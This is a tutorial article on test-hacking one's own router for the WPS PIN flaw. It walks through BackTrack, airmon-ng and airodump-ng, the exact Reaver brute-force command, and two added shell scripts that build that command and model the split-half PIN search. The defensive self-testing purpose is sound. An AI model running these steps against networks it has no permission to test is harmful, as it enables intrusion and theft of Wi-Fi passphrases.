If your Wi-Fi router supports Wi-Fi Protected Setup (WPS), and most newer home/small-business routers do, it might easily reveal its Wi-Fi passphrase to a readily available hacking tool.
You can use that same tool to check for yourself whether your router is vulnerable to WPS hacking. Here's how.
Recap: Why WPS routers are typically not secure
Think your Wi-Fi router’s safe because you use a long and complex passphrase? Think again! In the Dec. 13 Top Story, I discussed a fundamental security flaw in most routers using WPS technology.
In short, WPS-enabled routers have a built-in, easily hackable back door: the router's own eight-digit WPS PIN (personal identification number), normally printed on a label on the unit. The WPS protocol checks that PIN in two halves and tells the other side when the first half is right, so instead of 100 million possibilities an attacker has to try at most about 11,000 (10,000 for the first four digits plus 1,000 for the next three; the eighth digit is a check digit computed from the other seven). Free hacker tools that run on ordinary laptops, or even smartphones, can work through that in hours.
A hacked WPS PIN opens the door to your entire Wi-Fi network. With the correct PIN, an attacker can recover a router's WPA/WPA2 passphrase, giving him full access to the Wi-Fi network, no matter how long or complex that passphrase is. Here are the key points from last week's story:
- All routers that accept WPS PIN entry from an external device are vulnerable to this kind of PIN hacking; the flaw is in the protocol's design, not in one vendor's implementation.
- The only way to prevent this type of hacking is to disable WPS.
- Some routers are supposed to time-limit or otherwise automatically disable WPS, but there’s no obvious way to know whether this is working.
- Some router configuration software is faulty; even if you disable WPS in the router’s setup menus, WPS will actually still remain active — and vulnerable.
- The only sure way to determine whether your router is vulnerable to WPS PIN hacking is to test-hack it yourself. The easiest way to do so is with a free, open-source, white-hat hacking tool called Reaver.
In this article, I’ll walk you through the use of Reaver and some associated tools so you can see whether your own network is vulnerable to WPS hacking.
Note: Reaver's intended use is to find router vulnerabilities so they can be corrected. However, black-hat hackers can also use it to steal PINs and passphrases or for other malicious purposes. I shouldn't have to say this, but for the record:
Please don’t use Reaver for any purpose other than testing your own router’s security!
Let’s get started!
Building a bootable Linux system with BackTrack
Reaver is a Linux-based tool that's almost absurdly easy to use. A simple, one-line command sets off its WPS PIN-guessing process. If your router is vulnerable, Reaver will typically find its PIN within a few hours. It will then use the PIN to recover and reveal the router's passphrase, as simple as that.
For many Windows users, the hardest part of using Reaver is getting Linux going and gathering the Wi-Fi configuration information Reaver requires.
Fortunately, there’s an easy shortcut: run Reaver via a preconfigured, live Linux installation on a bootable DVD. There’s almost no setup or configuration involved; no partitioning, reformatting, or any similar operations; and your original Windows setup remains untouched and unchanged.
There are many bootable Linux distributions (versions) available, but I picked BackTrack 5, a self-contained, free, bootable, Ubuntu-based Linux installation that's optimized for network security testing. The BackTrack home page has links to hardware and Wi-Fi compatibility information, how-tos, troubleshooting, training info, FAQs, and more. It's worth spending some time there.
Here’s how to install BackTrack 5, step by step.
- When you’re ready to go, grab a free copy of BackTrack from its download page. As shown in Figure 1, I chose a 32-bit, ISO, Gnome-desktop version of the BackTrack Live DVD, downloaded directly (not via Torrent) to my Windows-based PC. All following screenshots are based on that version of BackTrack.
- Once the 3.1GB download finished, I burned it to DVD. (Need help? See Microsoft’s article, “Burn ISO images natively in Windows 7.”)
- Now insert the bootable BackTrack disc into your Wi-Fi-capable desktop or laptop and reboot.
Initially, the BackTrack DVD boots to a plain screen showing just a line of informational text and a Linux command prompt that says, simply, boot. When you see that prompt, press Enter.
- Next, you’ll see a screen labeled BackTrack 5 CD. BackTrack’s boot process pauses to let you select various optional configurations. For our purposes, the default choice — BackTrack Text (selected in Figure 3) — is fine. Press Enter — or do nothing and let BackTrack automatically boot in 30 seconds.
- After a flurry of system activity, you’ll see at the bottom of the screen a text-mode command prompt. Mine read: root@bt:~#, but yours might be slightly different, depending on your setup.
- Now launch BackTrack’s full graphical desktop interface. Type startx at the command prompt and press Enter.
- After a few moments, BackTrack’s desktop will appear. You now have a familiar point-and-click environment that’s conceptually much like Windows.
- Currently, BackTrack 5 does not come with Reaver preinstalled, but it’s simple to add it. To start, you need to connect temporarily to your Wi-Fi network.
On BackTrack’s main screen, click Applications/Internet/Wicd Network Manager.
- If your network is broadcasting its service-set identifier (SSID — your network’s name), select it from the resulting list. Click Connect and enter your Wi-Fi network’s normal passphrase.
If you’ve previously disabled SSID broadcasting, click Wicd Network Manager’s Network button and select Find a Hidden Network. Type in your network’s SSID and passphrase.
To download and install Reaver — and to do your test-hacking later — you need to open a Linux command-line Terminal window.
- Next, update BackTrack's list of available apps by typing the following string at the command prompt:
apt-get update
- When the update is finished, install Reaver by typing the following text at the command prompt:
apt-get install reaver
- With Reaver installed (it has no graphical interface; just follow the text that appears on-screen), go back to the Wicd Network Manager window and click Disconnect to turn off your Wi-Fi connection.
Identifying your specific wireless LAN
The next step is to gather some information about your specific Wi-Fi interface and setup. Fortunately, all the tools you’ll need are built into BackTrack.
- Start by finding your system’s wireless LAN (wlan) interface identifier. It’s easy: At a Terminal window’s command prompt, type iwconfig and press Enter. Next, look for an entry labeled wlan[X], where [X] is a number such as 0, 1, or 2. Most systems’ wireless LAN interface will be wlan0, as highlighted in Figure 11.
- Now, put your wireless card into monitor mode so it can listen passively to all the Wi-Fi routers within range. Enter the following command at a terminal window’s prompt:
airmon-ng start wlan0
(If your wireless interface was identified as wlan1, wlan2, or some other designator, use that instead of wlan0.)
- You’ll see output that looks something like what’s shown in Figure 12. Make note of the monitor mode enabled on mon[X] line (again, [X] will be a number such as 0, 1, 2, etc.). In most cases, the monitor mode will be mon0.
A brief technical aside might make the next step easier to understand. As mentioned earlier, your Wi-Fi router's SSID is the network name it broadcasts. But an SSID actually has two separate, independent components: the human-friendly name of a Wi-Fi network, formally known as the ESSID (extended service set identifier); and a machine-friendly BSSID (basic service set identifier), which is simply the hardware (MAC) address of the router's radio, written as six pairs of hex digits such as A0:21:B7:B0:D1:A1. The router transmits its BSSID in every beacon frame whether or not it hides its name, and the BSSID is what Reaver uses to pick its target.
- The next step is to find your router's BSSID. In a terminal window, type:
airodump-ng mon0
As before: if airmon-ng reported a different monitor interface (mon1, mon2, etc.), use that instead of mon0. Note that airodump-ng wants the monitor-mode interface created in the previous step, not the plain wlan0.
- The above command will produce a live display (or dump) of information from all Wi-Fi LANs in range of your system. Find your LAN’s ESSID (human-friendly name) on the right side of the list, and then make a note of its associated BSSID on the left. In this case, my ESSID is NETGEAR and the BSSID is A0:21:B7:B0:D1:A1.
If you previously disabled SSID broadcasting, don't expect your router to be missing from the list. airodump-ng still shows the BSSID of a hidden network; only the ESSID column changes, to something like <length: 0>. Match the BSSID against the MAC address printed on your router's label (or shown in its admin pages) to find your row. A hidden SSID offers no protection against Reaver, which works from the BSSID. If your router does not appear at all, the likely causes are that the adapter isn't really in monitor mode, that the router is on a band the adapter doesn't cover (for example 5 GHz), or that it's out of range; fix that before going on. A useful cross-check is the wash utility that comes with Reaver: wash -i mon0 lists only the WPS-enabled routers in range and shows whether each has WPS locked.
On the other hand, if your router does appear on the list, it’s time to get, ah, cracking with Reaver.
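The identification steps above, as an added example that is not part of the original article: a small shell script that extracts the wireless interface, the monitor interface and the BSSID from tool output and then assembles the Reaver command line. The iwconfig, airmon-ng and airodump-ng text embedded in it is constructed to resemble BackTrack 5 output (it is not a capture), so the script runs without a wireless card; on a real system you would pipe the live tool output into the same functions. The hidden-network row in the sample (BSSID 00:11:22:33:44:55) is there to show that airodump-ng still lists a router whose SSID is hidden.

```shell
#!/bin/sh
# Added helper (not from the article): pull the identifiers the Reaver step
# needs out of iwconfig / airmon-ng / airodump-ng output and build the command.
# The SAMPLE_* text is constructed to look like BackTrack 5 output; it is not a
# capture from a real system.

SAMPLE_IWCONFIG='lo        no wireless extensions.

eth0      no wireless extensions.

wlan0     IEEE 802.11bgn  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated   Tx-Power=15 dBm'

SAMPLE_AIRMON='Interface       Chipset         Driver

wlan0           Atheros         ath9k - [phy0]
                                (monitor mode enabled on mon0)'

SAMPLE_AIRODUMP=' CH  6 ][ Elapsed: 12 s ][ 2012-01-05 21:10

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 A0:21:B7:B0:D1:A1  -42       37        0    0   6  54e  WPA2 CCMP   PSK  NETGEAR
 00:11:22:33:44:55  -70       12        0    0  11  54e  WPA2 CCMP   PSK  <length:  0>'

# First wlanN interface listed by iwconfig (reads iwconfig output on stdin).
wlan_iface() {
    awk '/^wlan[0-9]+ /{print $1; exit}'
}

# Monitor interface airmon-ng created (reads airmon-ng output on stdin).
mon_iface() {
    sed -n 's/.*monitor mode enabled on \(mon[0-9]*\).*/\1/p' | head -n 1
}

# BSSID (column 1, a MAC address) of the airodump-ng row whose ESSID (last
# column) is exactly $1. ESSIDs containing spaces would need a different split.
bssid_for_essid() {
    awk -v want="$1" 'length($1) == 17 && $1 ~ /^[0-9A-Fa-f:]+$/ && $NF == want {print $1; exit}'
}

# BSSIDs of networks that hide their name: airodump-ng prints them with
# ESSID "<length: N>", so the router is still identifiable and attackable.
hidden_bssids() {
    awk '/<length:/ {print $1}'
}

# The one-line Reaver command from the article, built from the gathered values.
reaver_cmd() {
    printf 'reaver -i %s -b %s -vv' "$1" "$2"
}

# Walk the procedure over the constructed samples.
demo() {
    wlan=$(printf '%s\n' "$SAMPLE_IWCONFIG" | wlan_iface)
    mon=$(printf '%s\n' "$SAMPLE_AIRMON" | mon_iface)
    bssid=$(printf '%s\n' "$SAMPLE_AIRODUMP" | bssid_for_essid NETGEAR)
    echo "wireless interface: $wlan  (run: airmon-ng start $wlan)"
    echo "monitor interface:  $mon"
    echo "BSSID for NETGEAR:  $bssid"
    echo "hidden networks still listed by BSSID: $(printf '%s\n' "$SAMPLE_AIRODUMP" | hidden_bssids)"
    echo "command: $(reaver_cmd "$mon" "$bssid")"
}

demo
```

On a live BackTrack system the same functions would be fed with `iwconfig 2>/dev/null | wlan_iface`, `airmon-ng start wlan0 | mon_iface` and a saved airodump-ng screen (airodump-ng refreshes a live display, so capture it to a file first, or use its -w option and read the CSV).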
Letting Reaver do its PIN-cracking thing
A Reaver run typically takes two to 10 hours, longer if the router throttles or temporarily locks WPS after a burst of failed PINs, because Reaver then waits and retries. It's best to start Reaver in the evening (when you don't need your PC or your Wi-Fi) and let it run overnight. You can check the results in the morning.
The following steps will work in the majority of cases, but if you run into trouble getting Reaver to work, check out its wiki, FAQ, hardware-compatibility info, etc. on the Reaver site. If that doesn’t help, there’s a list of additional resources at the end of this article.
- Set Reaver loose on your network with the following one-line command, entered in a BackTrack Terminal window. Replace the items in square brackets with your network's specific designators. If Reaver later complains that it can't associate with the router or keeps hopping between channels, add -c followed by the channel number shown in airodump-ng's CH column for your router.
reaver -i mon[X] -b [BSSID] -vv
For example, using my mon0 monitor interface and A0:21:B7:B0:D1:A1 BSSID, my command is:
reaver -i mon0 -b A0:21:B7:B0:D1:A1 -vv
- Press Enter; Reaver will then try to initiate a WPS session with your router (repeatedly, if necessary) and will then try to hack in by plodding through the possible WPS PIN codes one after another. It doesn't need all 100 million eight-digit combinations: because the router's responses reveal when the first four digits are right, Reaver guesses those first (at most 10,000 tries), then the next three (at most 1,000 tries), and computes the eighth, check digit itself.
Figure 14 shows the kinds of messages it might display as it attempts to hack your WPS PIN.
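The recap said the PIN can be guessed in hours, and the step above said why: the protocol checks the PIN in halves. The following is an added example, not code from the article or from Reaver, that makes this concrete: a shell model in which one function stands in for the router's WPS registrar and another performs the same two-stage search Reaver runs. The router function and its reply names (nack_m4, nack_m6, ack) are a simplification of the real EAP exchange, assumed here for illustration; the check-digit calculation follows the scheme the WPS specification defines. The router PIN 12345670 is a constructed test value, not a real device's PIN.

```shell
#!/bin/sh
# Added example (not from the article or from Reaver): a toy model of the WPS
# PIN format and of the split brute force that makes it cheap to guess.

# Left-pad $2 with zeros to width $1; result in PAD (no subshell needed).
_pad() { p=$2; while [ ${#p} -lt "$1" ]; do p=0$p; done; PAD=$p; }

# Check digit defined by the WPS spec over the first seven digits: walking from
# the right, digits are weighted 3,1,3,1,3,1,3 and summed; the check digit
# brings the total to a multiple of ten. Result in WPS_CHECK.
_wps_check_digit() {
    s=$1; acc=0; w=3
    while [ -n "$s" ]; do
        d=${s#"${s%?}"}; s=${s%?}        # take and drop the last character
        acc=$((acc + w * d)); w=$((4 - w))
    done
    WPS_CHECK=$(((10 - acc % 10) % 10))
}
wps_checksum() { _wps_check_digit "$1"; echo "$WPS_CHECK"; }

# True when $1 is an eight-digit PIN whose last digit is the right check digit.
wps_pin_valid() {
    [ "${#1}" -eq 8 ] || return 1
    _wps_check_digit "${1%?}"
    [ "$WPS_CHECK" = "${1#???????}" ]
}

# Toy router. A real WPS registrar answers a wrong first half with EAP-NACK
# right after message M4 and a wrong second half only after M6, which leaks
# whether the first half was correct. Reply goes in AP_REPLY.
ap_try_pin() {   # $1 = router's PIN, $2 = attacker's guess
    if [ "${2%????}" != "${1%????}" ]; then AP_REPLY=nack_m4
    elif [ "$2" != "$1" ]; then AP_REPLY=nack_m6
    else AP_REPLY=ack; fi
}

# The search Reaver performs: first half alone (at most 10,000 tries), then
# the next three digits with the check digit computed, not guessed (at most
# 1,000 tries). Prints "<pin> <guesses>" on success.
split_brute_force() {
    secret=$1; guesses=0; first=; i=0
    while [ $i -lt 10000 ]; do
        _pad 4 $i; guesses=$((guesses + 1))
        ap_try_pin "$secret" "${PAD}0000"      # second half is irrelevant here
        if [ "$AP_REPLY" != nack_m4 ]; then first=$PAD; break; fi
        i=$((i + 1))
    done
    [ -n "$first" ] || { echo "first half not found"; return 1; }
    j=0
    while [ $j -lt 1000 ]; do
        _pad 3 $j; guesses=$((guesses + 1))
        _wps_check_digit "${first}${PAD}"
        pin="${first}${PAD}${WPS_CHECK}"
        ap_try_pin "$secret" "$pin"
        if [ "$AP_REPLY" = ack ]; then echo "$pin $guesses"; return 0; fi
        j=$((j + 1))
    done
    echo "second half not found"; return 1
}

# Worst case is 10000 + 1000 = 11000 guesses instead of 10^8 for a blind search.
echo "check digit for 1234567: $(wps_checksum 1234567)"
echo "recovered: $(split_brute_force 12345670)"
```

Against the constructed PIN 12345670 the model recovers the PIN after 1,803 guesses (1,235 for the first half, 568 for the second); a blind search over all eight digits could need tens of millions. The real attack is slower only because each guess is a full wireless exchange with the router, which is where the hours go.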
If you previously turned off WPS in your router's configuration screens (as recommended in last week's Top Story) and the router actually honours that setting, Reaver will fail to complete a WPS session and will never find a PIN or passphrase. If so, congratulations! You're safe from WPS hacking. Disabling SSID broadcasting, on the other hand, makes no difference: Reaver works from the BSSID, which the router transmits regardless. Two other outcomes are worth recognizing: a warning that the router is rate-limiting or has locked WPS means the router is slowing the attack, not necessarily stopping it, so let the run continue; and a run that never gets any response from the router at all may reflect a driver, channel or range problem rather than a secure router, so check the Reaver FAQ before declaring victory.
But if Reaver finds a working PIN (and/or the router’s passphrase), it will be displayed on-screen. In that case, you’ll know that your router is vulnerable to WPS hacking. Thank your lucky stars that you found this vulnerability before local hackers did!
To possibly eliminate the WPS vulnerability, check your router manufacturer's support pages to see whether there's a new firmware update available for your router; look for release notes that mention WPS, a working "disable WPS" option, or a lockout after repeated failed PIN attempts. If so, download and install the new firmware, and then re-test the new setup with Reaver.
If the updated firmware also succumbs to Reaver, your only real options are to get a better, newer router that properly controls and disables WPS, or to replace the factory firmware with third-party firmware from a resource such as the open-source dd-wrt.com (site), which generally doesn't implement WPS at all.
And of course, test the new router or firmware with Reaver, too!
Additional instructions, info, and tools
These links to online sites should provide everything you could want to know about WPS and Reaver.
- Wikipedia: Wi-Fi Protected Setup
- Smallnetbuilder.com: How is WPS supposed to work?
- Threatpost.com: Attack tool released for WPS PIN vulnerability
- Arstechnica.com: Researchers publish open-source tool for hacking Wi-Fi Protected Setup
- H-online.com: Wi-Fi Protected Setup made easier to brute force
- Reaver-wps: Wiki, FAQ, etc.
- Tacnetsol.com: Cracking Wi-Fi Protected Setup with Reaver
- Arstechnica.com: Hands-on: hacking Wi-Fi Protected Setup with Reaver
- Lifehacker.com: How to crack a Wi-Fi network’s WPA password with Reaver